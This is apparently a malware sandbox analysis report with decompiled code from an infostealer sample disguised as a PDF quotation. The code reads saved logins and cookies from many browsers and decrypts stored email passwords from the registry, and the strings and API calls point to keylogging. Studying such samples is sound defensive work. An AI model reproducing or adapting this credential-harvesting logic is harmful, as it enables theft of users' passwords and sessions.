0x004128a6
0x004128ab
0x004128b1
0x004128b4
0x004128bc
0x004128b6
0x004128b6
0x004128b6
0x004128c6
0x004128cc
0x004128d0
0x004128d2
0x004128d7
0x004128d7
0x004128da
0x004128da
0x004128e9
0x004128f6
0x00000000
0x004128fb
0x004127b1
0x004127b5
0x00000000
0x00000000
0x004127c4
0x004127c6
0x0041287d
0x0041288a
0x00412890
0x00000000
0x00412890
0x004127cf
0x004127d8
0x004127db
0x004127df
0x0041286f
0x00000000
0x0041286f
0x004127e8
0x00000000
0x004127f4
0x00000000
0x00000000
0x00412801
0x00000000
0x00000000
0x0041280e
0x00000000
0x00000000
0x0041281b
0x00000000
0x00000000
0x00412828
0x00000000
0x00000000
0x00412835
0x00000000
0x00000000
0x00412842
0x00000000
0x00000000
0x0041284f
0x00000000
0x00000000
0x0041285c
0x00000000
0x00000000
0x00412869
0x00000000
0x00000000
0x0041279a
0x00412e64
0x00000000
0x00412e6f

APIs

GetAsyncKeyState.USER32(00000010), ref: 004127BD
CallNextHookEx.USER32(00000000,00000040,?,?), ref: 00412E6F

Strings

[ENTER], xrefs: 00412B29
[ESC], xrefs: 00412B89
[DEL], xrefs: 00412BA9
[, xrefs: 0041289B
[INSERT], xrefs: 00412B99
[BKSP], xrefs: 00412B39
[TAB], xrefs: 00412B49
[ALT], xrefs: 00412B69
[CAPS], xrefs: 00412B79
i, xrefs: 00412A2F
[CTRL], xrefs: 00412B59

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AsyncCallHookNextState
String ID: [$[ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]$i
API String ID: 3912527877-3307426506
Opcode ID: 3a9da735429c08ab7b3eff429198961491d945b2513df37c317835625e38b0f7
Instruction ID: 00a558b54961ba64570f43a5bfbd56e2be415cf51c8379766b262c175ab285ce
Opcode Fuzzy Hash: 3a9da735429c08ab7b3eff429198961491d945b2513df37c317835625e38b0f7
Instruction Fuzzy Hash: 34F18130645345EADF28AB99BB1A7EE7360BB00B05F72405FE011E5590DBFC4AE1E61E

Uniqueness

Uniqueness Score: -1.00%

Function 00417C54 Relevance: 42.9, Strings: 34, Instructions: 427
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00417C54(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				char _v200;
				char _v216;
				char _v232;
				char _v248;
				char _v268;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t157;
				intOrPtr* _t160;
				intOrPtr* _t163;
				intOrPtr* _t166;
				intOrPtr* _t169;
				intOrPtr* _t172;
				intOrPtr* _t175;
				intOrPtr* _t178;
				intOrPtr* _t181;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t190;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr* _t199;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t206;
				intOrPtr* _t211;
				intOrPtr* _t216;
				intOrPtr _t218;
				intOrPtr* _t220;
				intOrPtr _t232;
				signed int _t233;
				intOrPtr* _t235;
				intOrPtr _t238;
				signed int _t243;
				intOrPtr* _t245;
				intOrPtr _t248;
				signed int _t253;
				intOrPtr* _t255;
				intOrPtr _t257;
				signed int _t262;
				char* _t285;
				void* _t293;
				void* _t326;
				void* _t331;
				void* _t336;
				void* _t344;

				_t343 = __edx;
				 *0x42cdb4 = _a4;
				 *0x42cdb4 = _a4;
				_t134 =  *0x42cdb4; // 0x0
				_v184 =  *((intOrPtr*)(_t134 + 4));
				_t136 =  *0x42cdb4; // 0x0
				E0042455B(_v184,  &_v48,  *((intOrPtr*)(_t136 + 8)), 0);
				_t285 =  &_v48;
				if(E00401546(_t285) != 0) {
					_t140 =  *0x42cdb4; // 0x0
					_v56 =  *_t140;
					_push(_t285);
					E004066FC(_t344,  &_v48);
					E00414A3D(_v56, _t285);
					_t145 =  *0x42cdb4; // 0x0
					_t288 =  *_t145;
					_t146 = E00414A7D( *_t145, __edx, __eflags);
					__eflags = _t146;
					if(_t146 == 0) {
						L20:
						_t147 =  *0x42cdb4; // 0x0
						_v176 =  *_t147;
						E0040B853( *0x42cdb4);
						E00414A29(_v176);
						_t128 =  &_v180;
						 *_t128 = _v180 & 0x00000000;
						__eflags =  *_t128;
						E004066DA();
						return _v180;
					}
					__eflags =  *0x42cebc;
					if( *0x42cebc == 0) {
						L18:
						__eflags =  *0x42cebc;
						if(__eflags != 0) {
							E0041E9F8(_t288, __eflags,  &_v40, 0x1a);
							_pop(_t293);
							E0041E9F8(_t293, __eflags,  &_v36, 0x1a);
							_t157 =  *0x42cdb4; // 0x0
							_v96 =  *_t157;
							E004198D1(_v96, __eflags, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
							_t160 =  *0x42cdb4; // 0x0
							_v100 =  *_t160;
							E00419181(_v100, __eflags, L"\\Google\\Chrome Beta\\User Data\\Default\\Login Data", L"\\Google\\Chrome Beta\\User Data\\Local State", 0, 0, 1);
							_t163 =  *0x42cdb4; // 0x0
							_v104 =  *_t163;
							E00419181(_v104, __eflags, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
							_t166 =  *0x42cdb4; // 0x0
							_v108 =  *_t166;
							E00419181(_v108, __eflags, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
							_t169 =  *0x42cdb4; // 0x0
							_v112 =  *_t169;
							E00419181(_v112, __eflags, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
							_t172 =  *0x42cdb4; // 0x0
							_v116 =  *_t172;
							E00419181(_v116, __eflags, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
							_t175 =  *0x42cdb4; // 0x0
							_v120 =  *_t175;
							E00419181(_v120, __eflags, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
							_t178 =  *0x42cdb4; // 0x0
							_v124 =  *_t178;
							E00419181(_v124, __eflags, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
							_t181 =  *0x42cdb4; // 0x0
							_v128 =  *_t181;
							E00419181(_v128, __eflags, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
							_t184 =  *0x42cdb4; // 0x0
							_v132 =  *_t184;
							E00419181(_v132, __eflags, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
							_t187 =  *0x42cdb4; // 0x0
							_v136 =  *_t187;
							E00419181(_v136, __eflags, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
							_t190 =  *0x42cdb4; // 0x0
							_v140 =  *_t190;
							E00419181(_v140, __eflags, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
							_t193 =  *0x42cdb4; // 0x0
							_v144 =  *_t193;
							E00419181(_v144, __eflags, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
							_t196 =  *0x42cdb4; // 0x0
							_v148 =  *_t196;
							E00419181(_v148, __eflags, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
							_t199 =  *0x42cdb4; // 0x0
							_v152 =  *_t199;
							E00419181(_v152, __eflags, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
							_t202 =  *0x42cdb4; // 0x0
							E00418297( *_t202, __eflags);
							_t204 =  *0x42cdb4; // 0x0
							E00415097( *_t204, __eflags);
							_t206 =  *0x42cdb4; // 0x0
							_v156 =  *_t206;
							E00406FBC(_t344,  &_v36);
							E0041579C(_v156, __eflags,  *_t204);
							_t211 =  *0x42cdb4; // 0x0
							_v160 =  *_t211;
							E00406FBC(_t344,  &_v40);
							E00415E64(_v160, __eflags, _v156);
							_t216 =  *0x42cdb4; // 0x0
							E004149DA( *_t216, __eflags);
							_t218 =  *0x42cdb4; // 0x0
							_v172 =  *((intOrPtr*)(_t218 + 8));
							_t220 =  *0x42cdb4; // 0x0
							_v164 =  *_t220;
							_v168 = E00424086( &_v268, E00403CB9(_v164,  &_v248));
							E00409811(_v172, _v168);
							E00424061( &_v268);
							E00404000( &_v248);
							E00414A5F();
							E00406BE2();
							E00406BE2();
						}
						goto L20;
					}
					_t232 =  *0x42cdb4; // 0x0
					__eflags =  *(_t232 + 0xc);
					if( *(_t232 + 0xc) == 0) {
						goto L18;
					}
					_t233 = E0040B8D1(0x61a5c);
					_pop(_t326);
					_v8 = _t233;
					__eflags = _v8;
					if(_v8 == 0) {
						_t23 =  &_v20;
						 *_t23 = _v20 & 0x00000000;
						__eflags =  *_t23;
					} else {
						 *_v8 = 0x270f;
						E00401477(_t326, _v8 + 4, 0x28, 0x270f, E00403D2F);
						_v20 = _v8 + 4;
					}
					 *0x42cca8 = _v20;
					 *0x42ccac =  *0x42ccac & 0x00000000;
					_t235 =  *0x42cdb4; // 0x0
					_v60 =  *_t235;
					_push(1);
					E004188C6(_v60, _t343, __eflags, L"\\Google\\Chrome\\User Data\\Default\\Network\\Cookies", L"\\Google\\Chrome\\User Data\\Local State", 0);
					_t238 =  *0x42cdb4; // 0x0
					_v68 =  *((intOrPtr*)(_t238 + 8));
					_v64 = E004050CA( &_v200,  *0x42cca8,  *0x42ccac, 1);
					E00409811(_v68, _v64);
					E004050B0( &_v200);
					_t243 = E0040B8D1(0x61a5c);
					_t331 = 0;
					_v12 = _t243;
					__eflags = _v12;
					if(_v12 == 0) {
						_t41 =  &_v24;
						 *_t41 = _v24 & 0x00000000;
						__eflags =  *_t41;
					} else {
						 *_v12 = 0x270f;
						E00401477(_t331, _v12 + 4, 0x28, 0x270f, E00403D2F);
						_v24 = _v12 + 4;
					}
					 *0x42cca8 = _v24;
					 *0x42ccac =  *0x42ccac & 0x00000000;
					_t245 =  *0x42cdb4; // 0x0
					_v72 =  *_t245;
					_push(7);
					E004188C6(_v72, _t343, __eflags, L"\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies", L"\\Microsoft\\Edge\\User Data\\Local State", 0);
					_t248 =  *0x42cdb4; // 0x0
					_v80 =  *((intOrPtr*)(_t248 + 8));
					_v76 = E004050CA( &_v216,  *0x42cca8,  *0x42ccac, 7);
					E00409811(_v80, _v76);
					E004050B0( &_v216);
					_t253 = E0040B8D1(0x61a5c);
					_t336 = 0;
					_v16 = _t253;
					__eflags = _v16;
					if(_v16 == 0) {
						_t59 =  &_v28;
						 *_t59 = _v28 & 0x00000000;
						__eflags =  *_t59;
					} else {
						 *_v16 = 0x270f;
						E00401477(_t336, _v16 + 4, 0x28, 0x270f, E00403D2F);
						_v28 = _v16 + 4;
					}
					 *0x42cca8 = _v28;
					 *0x42ccac =  *0x42ccac & 0x00000000;
					_t255 =  *0x42cdb4; // 0x0
					E004182AB( *_t255, _t343, __eflags);
					_t257 =  *0x42cdb4; // 0x0
					_v88 =  *((intOrPtr*)(_t257 + 8));
					_v84 = E004050CA( &_v232,  *0x42cca8,  *0x42ccac, 0);
					E00409811(_v88, _v84);
					E004050B0( &_v232);
					_t262 =  *0x42cca8; // 0x0
					_v32 = _t262;
					__eflags = _v32;
					if(_v32 == 0) {
						_t73 =  &_v92;
						 *_t73 = _v92 & 0x00000000;
						__eflags =  *_t73;
					} else {
						_v92 = E00402185(3);
					}
					goto L20;
				}
				_v52 = _v52 & 0x00000000;
				E004066DA();
				return _v52;
			}

0x00417c54
0x00417c60
0x00417c68
0x00417c6d
0x00417c75
0x00417c7d
0x00417c8f
0x00417c94
0x00417c9e
0x00417cb4
0x00417cbb
0x00417cbe
0x00417cc6
0x00417cce
0x00417cd3
0x00417cd8
0x00417cda
0x00417cdf
0x00417ce1
0x0041825a
0x0041825a
0x00418261
0x0041826d
0x00418279
0x0041827e
0x0041827e
0x0041827e
0x00418288
0x00000000
0x0041828d
0x00417ce7
0x00417cee
0x00417f29
0x00417f29
0x00417f30
0x00417f3c
0x00417f42
0x00417f49
0x00417f50
0x00417f57
0x00417f6d
0x00417f72
0x00417f79
0x00417f8f
0x00417f94
0x00417f9b
0x00417fb1
0x00417fb6
0x00417fbd
0x00417fd3
0x00417fd8
0x00417fdf
0x00417ff5
0x00417ffa
0x00418001
0x00418017
0x0041801c
0x00418023
0x00418039
0x0041803e
0x00418045
0x0041805b
0x00418060
0x00418067
0x0041807d
0x00418082
0x00418089
0x0041809f
0x004180a4
0x004180ab
0x004180c7
0x004180cc
0x004180d3
0x004180ef
0x004180f4
0x004180fb
0x00418117
0x0041811c
0x00418123
0x0041813f
0x00418144
0x0041814b
0x00418167
0x0041816c
0x00418173
0x00418178
0x0041817f
0x00418184
0x0041818b
0x00418198
0x004181a3
0x004181a8
0x004181af
0x004181bc
0x004181c7
0x004181cc
0x004181d3
0x004181d8
0x004181e0
0x004181e6
0x004181ed
0x00418211
0x00418223
0x0041822e
0x00418239
0x00418245
0x0041824d
0x00418255
0x00418255
0x00000000
0x00417f30
0x00417cf4
0x00417cf9
0x00417cfd
0x00000000
0x00000000
0x00417d08
0x00417d0d
0x00417d0e
0x00417d11
0x00417d15
0x00417d43
0x00417d43
0x00417d43
0x00417d17
0x00417d1a
0x00417d33
0x00417d3e
0x00417d3e
0x00417d4a
0x00417d4f
0x00417d56
0x00417d5d
0x00417d60
0x00417d73
0x00417d78
0x00417d80
0x00417d9c
0x00417da5
0x00417db0
0x00417dba
0x00417dbf
0x00417dc0
0x00417dc3
0x00417dc7
0x00417df5
0x00417df5
0x00417df5
0x00417dc9
0x00417dcc
0x00417de5
0x00417df0
0x00417df0
0x00417dfc
0x00417e01
0x00417e08
0x00417e0f
0x00417e12
0x00417e25
0x00417e2a
0x00417e32
0x00417e4e
0x00417e57
0x00417e62
0x00417e6c
0x00417e71
0x00417e72
0x00417e75
0x00417e79
0x00417ea7
0x00417ea7
0x00417ea7
0x00417e7b
0x00417e7e
0x00417e97
0x00417ea2
0x00417ea2
0x00417eae
0x00417eb3
0x00417eba
0x00417ec1
0x00417ec6
0x00417ece
0x00417eea
0x00417ef3
0x00417efe
0x00417f03
0x00417f08
0x00417f0b
0x00417f0f
0x00417f20
0x00417f20
0x00417f20
0x00417f11
0x00417f1b
0x00417f1b
0x00000000
0x00417f24
0x00417ca0
0x00417ca7
0x00000000

Strings

\Tencent\QQBrowser\User Data\Local State, xrefs: 0041800A
\Google\Chrome\User Data\Default\Network\Cookies, xrefs: 00417D6B
\Microsoft\Edge\User Data\Local State, xrefs: 00417E18
\Vivaldi\User Data\Local State, xrefs: 004180B7
\Torch\User Data\Default\Login Data, xrefs: 0041810C
\Microsoft\Edge\User Data\Local State, xrefs: 00417FC6
\Epic Privacy Browser\User Data\Default\Login Data, xrefs: 00417FA9
\UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 00417FED
\Comodo\Dragon\User Data\Local State, xrefs: 004180DF
\Blisk\User Data\Default\Login Data, xrefs: 00418053
\Epic Privacy Browser\User Data\Local State, xrefs: 00417FA4
\Google\Chrome\User Data\Local State, xrefs: 00417D66
\Vivaldi\User Data\Default\Login Data, xrefs: 004180BC
\Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0041800F
\Slimjet\User Data\Local State, xrefs: 0041812F
\CentBrowser\User Data\Local State, xrefs: 00418157
\Chromium\User Data\Default\Login Data, xrefs: 00418075
\Blisk\User Data\Local State, xrefs: 0041804E
\Chromium\User Data\Local State, xrefs: 00418070
\BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 00418092
\BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 00418097
\Opera Software\Opera Stable\Local State, xrefs: 0041802C
\Google\Chrome Beta\User Data\Local State, xrefs: 00417F82
\UCBrowser\User Data_i18n\Local State, xrefs: 00417FE8
\Google\Chrome\User Data\Default\Login Data, xrefs: 00417F65
\Opera Software\Opera Stable\Login Data, xrefs: 00418031
\Torch\User Data\Local State, xrefs: 00418107
\Microsoft\Edge\User Data\Default\Network\Cookies, xrefs: 00417E1D
\Slimjet\User Data\Default\Login Data, xrefs: 00418134
\Microsoft\Edge\User Data\Default\Login Data, xrefs: 00417FCB
\CentBrowser\User Data\Default\Login Data, xrefs: 0041815C
\Google\Chrome Beta\User Data\Default\Login Data, xrefs: 00417F87
\Google\Chrome\User Data\Local State, xrefs: 00417F60
\Comodo\Dragon\User Data\Default\Login Data, xrefs: 004180E4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID:
String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome Beta\User Data\Default\Login Data$\Google\Chrome Beta\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Default\Network\Cookies$\Google\Chrome\User Data\Local State$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Default\Network\Cookies$\Microsoft\Edge\User Data\Local State$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
API String ID: 0-204766131
Opcode ID: 7201ac1be44f2375590112637ee2d25460f29d9481b05e7c0bf0057bb300adef
Instruction ID: 7c09b6918c4ce8d98a6332ab9c81899d5d07ebc208bedf97123c425044d3530b
Opcode Fuzzy Hash: 7201ac1be44f2375590112637ee2d25460f29d9481b05e7c0bf0057bb300adef
Instruction Fuzzy Hash: D4020570B54218AFEB20EB55DC96FAD77B1EB18704F50406AF505AB2E1CBB86D81CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004152D3 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 295
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004152D3(intOrPtr __ecx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v296;
				char _v556;
				char _v816;
				char _v9008;
				char _v17200;
				long _t141;
				long _t146;
				long _t151;
				long _t156;
				void* _t157;
				intOrPtr _t202;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t227;

				_t227 = __eflags;
				_t202 = __ecx;
				E004012A0(0x432c, __ecx);
				_v28 = _t202;
				_v8 = 0x1000;
				_t203 =  &_v24;
				E00419976( &_v24, _t227);
				E0040132F( &_v296, 0, 0x104);
				E0040132F( &_v556, 0, 0x104);
				E0040132F( &_v816, 0, 0x104);
				E0040132F( &_v9008, 0, _v8);
				_t213 = _t209 + 0x30;
				if(RegQueryValueExW(_a4, L"Account Name", 0, 0,  &_v9008,  &_v8) == 0) {
					_t203 =  &_v20;
					E00406A11( &_v20,  &_v9008);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t214 = _t213 + 0xc;
				if(RegQueryValueExW(_a4, L"Email", 0, 0,  &_v9008,  &_v8) == 0) {
					_t203 =  &_v20;
					E00406A11( &_v20,  &_v9008);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t215 = _t214 + 0xc;
				if(RegQueryValueExW(_a4, L"POP3 Server", 0, 0,  &_v9008,  &_v8) == 0) {
					_t203 =  &_v24;
					E00406A11( &_v24,  &_v9008);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t216 = _t215 + 0xc;
				if(RegQueryValueExW(_a4, L"POP3 User", 0, 0,  &_v9008,  &_v8) == 0) {
					_t203 =  &_v20;
					E00406A11( &_v20,  &_v9008);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t217 = _t216 + 0xc;
				if(RegQueryValueExW(_a4, L"SMTP Server", 0, 0,  &_v9008,  &_v8) == 0) {
					_t203 =  &_v24;
					E00406A11( &_v24,  &_v9008);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t218 = _t217 + 0xc;
				_t141 = RegQueryValueExW(_a4, L"POP3 Password", 0, 0,  &_v9008,  &_v8);
				_t233 = _t141;
				if(_t141 == 0) {
					E0040132F( &_v17200, 0, 0x1000);
					E004156D1(_t203, _t233,  &_v9008,  &_v17200, _v8);
					_t218 = _t218 + 0x18;
					_t203 =  &_v16;
					E00406A11( &_v16,  &_v17200);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t219 = _t218 + 0xc;
				_t146 = RegQueryValueExW(_a4, L"SMTP Password", 0, 0,  &_v9008,  &_v8);
				_t234 = _t146;
				if(_t146 == 0) {
					E0040132F( &_v17200, 0, 0x1000);
					E004156D1(_t203, _t234,  &_v9008,  &_v17200, _v8);
					_t219 = _t219 + 0x18;
					_t203 =  &_v16;
					E00406A11( &_v16,  &_v17200);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t220 = _t219 + 0xc;
				_t151 = RegQueryValueExW(_a4, L"HTTP Password", 0, 0,  &_v9008,  &_v8);
				_t235 = _t151;
				if(_t151 == 0) {
					E0040132F( &_v17200, 0, 0x1000);
					E004156D1(_t203, _t235,  &_v9008,  &_v17200, _v8);
					_t220 = _t220 + 0x18;
					_t203 =  &_v16;
					E00406A11( &_v16,  &_v17200);
				}
				_v8 = 0x1000;
				E0040132F( &_v9008, 0, _v8);
				_t221 = _t220 + 0xc;
				_t156 = RegQueryValueExW(_a4, L"IMAP Password", 0, 0,  &_v9008,  &_v8);
				_t236 = _t156;
				if(_t156 == 0) {
					E0040132F( &_v17200, 0, 0x1000);
					E004156D1(_t203, _t236,  &_v9008,  &_v17200, _v8);
					_t221 = _t221 + 0x18;
					E00406A11( &_v16,  &_v17200);
				}
				_v12 = 3;
				_t157 = E00406F1B( &_v24);
				_t237 = _t157;
				if(_t157 > 0) {
					_v32 = _v28;
					E00403CD2(_t221 - 0x10,  &_v24);
					E00403E71(_v32);
				}
				_v36 = 1;
				E004018BB( &_v24, _t237);
				return _v36;
			}

0x004152d3
0x004152d3
0x004152db
0x004152e0
0x004152e3
0x004152ea
0x004152ed
0x00415300
0x00415316
0x0041532c
0x00415340
0x00415345
0x00415367
0x00415370
0x00415373
0x00415373
0x00415378
0x0041538b
0x00415390
0x004153b2
0x004153bb
0x004153be
0x004153be
0x004153c3
0x004153d6
0x004153db
0x004153fd
0x00415406
0x00415409
0x00415409
0x0041540e
0x00415421
0x00415426
0x00415448
0x00415451
0x00415454
0x00415454
0x00415459
0x0041546c
0x00415471
0x00415493
0x0041549c
0x0041549f
0x0041549f
0x004154a4
0x004154b7
0x004154bc
0x004154d6
0x004154dc
0x004154de
0x004154ee
0x00415507
0x0041550c
0x00415516
0x00415519
0x00415519
0x0041551e
0x00415531
0x00415536
0x00415550
0x00415556
0x00415558
0x00415568
0x00415581
0x00415586
0x00415590
0x00415593
0x00415593
0x00415598
0x004155ab
0x004155b0
0x004155ca
0x004155d0
0x004155d2
0x004155e2
0x004155fb
0x00415600
0x0041560a
0x0041560d
0x0041560d
0x00415612
0x00415625
0x0041562a
0x00415644
0x0041564a
0x0041564c
0x0041565c
0x00415675
0x0041567a
0x00415687
0x00415687
0x0041568c
0x00415696
0x0041569b
0x0041569d
0x004156a2
0x004156ae
0x004156b6
0x004156b6
0x004156bb
0x004156c5
0x004156ce

APIs

RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,?,0041529B), ref: 0041535F
RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 004153AA
RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 004153F5
RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00415440
RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 0041548B
RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 004154D6
RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00415550
RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 004155CA
RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00415644

Part of subcall function 004156D1: GlobalAlloc.KERNEL32(00000040,zVA,?,0041567A,?,?,00001000), ref: 004156E5
Part of subcall function 004156D1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415738
Part of subcall function 004156D1: lstrcpyW.KERNEL32 ref: 00415784

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

Strings

SMTP Server, xrefs: 00415483
POP3 Password, xrefs: 004154CE
IMAP Password, xrefs: 0041563C
SMTP Password, xrefs: 00415548
Account Name, xrefs: 00415357
POP3 User, xrefs: 00415438
HTTP Password, xrefs: 004155C2
POP3 Server, xrefs: 004153ED
Email, xrefs: 004153A2

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
API String ID: 6593746-2537589853
Opcode ID: 219ba1c8b4b17c5c5cf34b340a624ba0a413456908a573a12a0a3f1716105dbf
Instruction ID: e099040a5354bf4c154d1b9ade51a9aa3b8c7e8a15de47dd3425a9b853e9109a
Opcode Fuzzy Hash: 219ba1c8b4b17c5c5cf34b340a624ba0a413456908a573a12a0a3f1716105dbf
Instruction Fuzzy Hash: 1CB111B1D4010CFADB11EBA0DD45FDE77BCAB08744F9040A6F605F6190EB78AB589B98

Uniqueness

Uniqueness Score: -1.00%

Function 00413C30 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 220
stringwindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00413C30(void* __eflags, void* _a4) {
				char _v8;
				int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				struct _SYSTEMTIME _v76;
				struct tagMSG _v104;
				struct _WNDCLASSW _v144;
				char _v160;
				short _v320;
				short _v840;
				intOrPtr _t75;
				intOrPtr _t78;
